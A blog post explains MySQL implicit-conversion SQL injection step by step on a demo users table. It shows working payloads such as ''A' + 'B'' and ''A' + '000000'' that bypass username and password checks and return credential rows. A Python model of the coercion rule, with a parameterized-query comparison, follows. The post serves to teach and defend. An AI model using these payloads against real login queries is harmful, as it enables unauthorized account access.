The author is very careful, so I am sharing my notes with my blog readers. To make the idea easy to follow, the implicit-conversion injection examples can be analysed directly.

First create a table and add two users:

CREATE TABLE `users` (
  `userid` int(11) NOT NULL AUTO_INCREMENT,
  `username` varchar(45) NOT NULL,
  `password` varchar(45) NOT NULL,
  PRIMARY KEY (`userid`)
);
INSERT INTO `users` (`username`, `password`) VALUES ('admin', 'MySuperS3cretPass!');
INSERT INTO `users` (`username`, `password`) VALUES ('666admin', 'nataSamI');

Now look at the following query:

mysql> SELECT * FROM users WHERE username = 'A' + 'B' AND password = 'A' + 'B';
+--------+----------+--------------------+
| userid | username | password           |
+--------+----------+--------------------+
|      1 | admin    | MySuperS3cretPass! |
+--------+----------+--------------------+
1 row in set, 7 warnings (0.00 sec)

mysql> SHOW WARNINGS;
+---------+------+--------------------------------------------------------+
| Level   | Code | Message                                                |
+---------+------+--------------------------------------------------------+
| Warning | 1292 | Truncated incorrect DOUBLE value: 'admin'              |
| Warning | 1292 | Truncated incorrect DOUBLE value: 'B'                  |
| Warning | 1292 | Truncated incorrect DOUBLE value: 'A'                  |
| Warning | 1292 | Truncated incorrect DOUBLE value: 'MySuperS3cretPass!' |
| Warning | 1292 | Truncated incorrect DOUBLE value: 'B'                  |
| Warning | 1292 | Truncated incorrect DOUBLE value: 'A'                  |
| Warning | 1292 | Truncated incorrect DOUBLE value: '666admin'           |
+---------+------+--------------------------------------------------------+
7 rows in set (0.00 sec)

Curious about the result? Yes, this is implicit-conversion injection. Let's analyse the principle.

mysql> SELECT 1 + 1;
+-------+
| 1 + 1 |
+-------+
|     2 |
+-------+
1 row in set (0.00 sec)

There is nothing surprising about that query, so I won't dwell on it. Next:

mysql> SELECT 'foo' + 1;
+-----------+
| 'foo' + 1 |
+-----------+
|         1 |
+-----------+
1 row in set, 1 warning (0.00 sec)

mysql> SHOW WARNINGS;
+---------+------+-----------------------------------------+
| Level   | Code | Message                                 |
+---------+------+-----------------------------------------+
| Warning | 1292 | Truncated incorrect DOUBLE value: 'foo' |
+---------+------+-----------------------------------------+
1 row in set (0.00 sec)

Implicit conversion occurs here, and the result is 1: 'foo' is converted to the DOUBLE type, but since it is clearly not a number it becomes 0. The MySQL manual says: "When an operator is used with operands of different types, type conversion occurs to make the operands compatible."

What about adding two strings? Is no conversion needed there? Run the following statement:

mysql> SELECT 'A' + 'B';
+-----------+
| 'A' + 'B' |
+-----------+
|         0 |
+-----------+
1 row in set, 2 warnings (0.00 sec)

mysql> SHOW WARNINGS;
+---------+------+---------------------------------------+
| Level   | Code | Message                               |
+---------+------+---------------------------------------+
| Warning | 1292 | Truncated incorrect DOUBLE value: 'B' |
| Warning | 1292 | Truncated incorrect DOUBLE value: 'A' |
+---------+------+---------------------------------------+
2 rows in set (0.00 sec)

Here + is an arithmetic operator, so both strings are converted to numeric values: 0 + 0, and the result is 0. The sum of the two strings is 0. From this query we know that SELECT 'A' + 'B' = 0 is true (the value is 1). Now compare the sum of two strings with yet another string:

mysql> SELECT 'A' + 'B' = 'C';
+-----------------+
| 'A' + 'B' = 'C' |
+-----------------+
|               1 |
+-----------------+
1 row in set, 3 warnings (0.00 sec)

mysql> SHOW WARNINGS;
+---------+------+---------------------------------------+
| Level   | Code | Message                               |
+---------+------+---------------------------------------+
| Warning | 1292 | Truncated incorrect DOUBLE value: 'B' |
| Warning | 1292 | Truncated incorrect DOUBLE value: 'A' |
| Warning | 1292 | Truncated incorrect DOUBLE value: 'C' |
+---------+------+---------------------------------------+
3 rows in set (0.00 sec)

The warnings show that all three strings are implicitly converted; what actually executes is SELECT 0 = 0, and the result is 1. The MySQL manual says: "In all other cases, the arguments are compared as floating-point (real) numbers."

Now back to the case at the beginning of the article:

SELECT * FROM users WHERE username = 'A' + 'B' AND password = 'A' + 'B';

The values are implicitly converted and then compared while the query runs. For the first record, the username check effectively runs SELECT 'admin' = 'A' + 'B', which is naturally 1, and the password check is the same. When the second record is reached, SELECT '666admin' = 'A' + 'B' reduces to SELECT 666 = 'A' + 'B', because the leading digits of '666admin' survive the conversion to DOUBLE; that comparison is false (the value is 0). That is why the query returns only the first row. If instead the second condition SELECT '666admin' = 666 is satisfied, the statement is as follows:

mysql> SELECT * FROM users WHERE username = 'A' + '000000' AND password = 'A' + 'B';
+--------+----------+----------+
| userid | username | password |
+--------+----------+----------+
|      2 | 666admin | nataSamI |
+--------+----------+----------+
1 row in set, 6 warnings (0.00 sec)

Other operators can be used here as well...
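To see exactly why 'admin' matches and '666admin' does not, here is an added Python model of the coercion rule that the 1292 warnings reveal (my code, not the original author's and not MySQL's own): it implements the leading-numeric-prefix conversion to DOUBLE, the string-versus-number comparison rule, and evaluates the page's WHERE clause against a constructed copy of the users table, beside the parameterized version where the same input stays a plain string. The regex details and the '666' operand used in the checks are assumptions, not taken from the page.

```python
import re
from typing import List, Tuple, Union

# Model of MySQL's string-to-DOUBLE coercion (an assumption inferred from the
# page's warnings, not MySQL's own code): the longest leading numeric prefix
# is kept, anything after it is dropped with warning 1292, and a string with
# no numeric prefix becomes 0. So 'admin' -> 0, '666admin' -> 666, '1e3x' -> 1000.
_NUM_PREFIX = re.compile(r"^\s*([+-]?(?:\d+\.?\d*|\.\d+)(?:[eE][+-]?\d+)?)")

def str_to_double(s: str) -> Tuple[float, bool]:
    """Return (value, truncated); truncated is True whenever MySQL would warn."""
    m = _NUM_PREFIX.match(s)
    if not m:
        return 0.0, True
    return float(m.group(1)), m.end() != len(s)

def sql_add(a: str, b: str) -> float:
    """'+' is arithmetic: both strings are coerced to DOUBLE before adding."""
    return str_to_double(a)[0] + str_to_double(b)[0]

def sql_equal(lhs: Union[str, float], rhs: Union[str, float]) -> bool:
    """MySQL '=': string vs string compares as strings; any other mix of
    types compares both operands as floating-point numbers."""
    if isinstance(lhs, str) and isinstance(rhs, str):
        return lhs == rhs
    def to_num(v): return str_to_double(v)[0] if isinstance(v, str) else float(v)
    return to_num(lhs) == to_num(rhs)

# Constructed copy of the page's users table: (username, password).
USERS = [("admin", "MySuperS3cretPass!"), ("666admin", "nataSamI")]

def injected_where(users, u1: str, u2: str, p1: str, p2: str) -> List[str]:
    """Rows matched by  WHERE username = u1 + u2 AND password = p1 + p2
    when the literals are spliced into the SQL text, i.e. the page's query."""
    matched = []
    for name, pw in users:
        # username = 'A' + 'B' compares a string against a DOUBLE, so every
        # username without a numeric prefix converts to 0 and matches.
        if sql_equal(name, sql_add(u1, u2)) and sql_equal(pw, sql_add(p1, p2)):
            matched.append(name)
    return matched

def parameterized_where(users, username: str, password: str) -> List[str]:
    """Same query with bound parameters: the input arrives as one string
    value, never as an expression, so both sides stay strings and no
    coercion happens. The text "'A' + 'B'" is then a literal matching nobody."""
    return [n for n, pw in users if sql_equal(n, username) and sql_equal(pw, password)]
```

Every str_to_double call that returns truncated=True corresponds to one 1292 warning in SHOW WARNINGS, which is also the signal a DBA can watch for when string columns are suddenly being compared as numbers.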
Reference: http://vagosec.org/2013/04/mysql-implicit-type-conversion/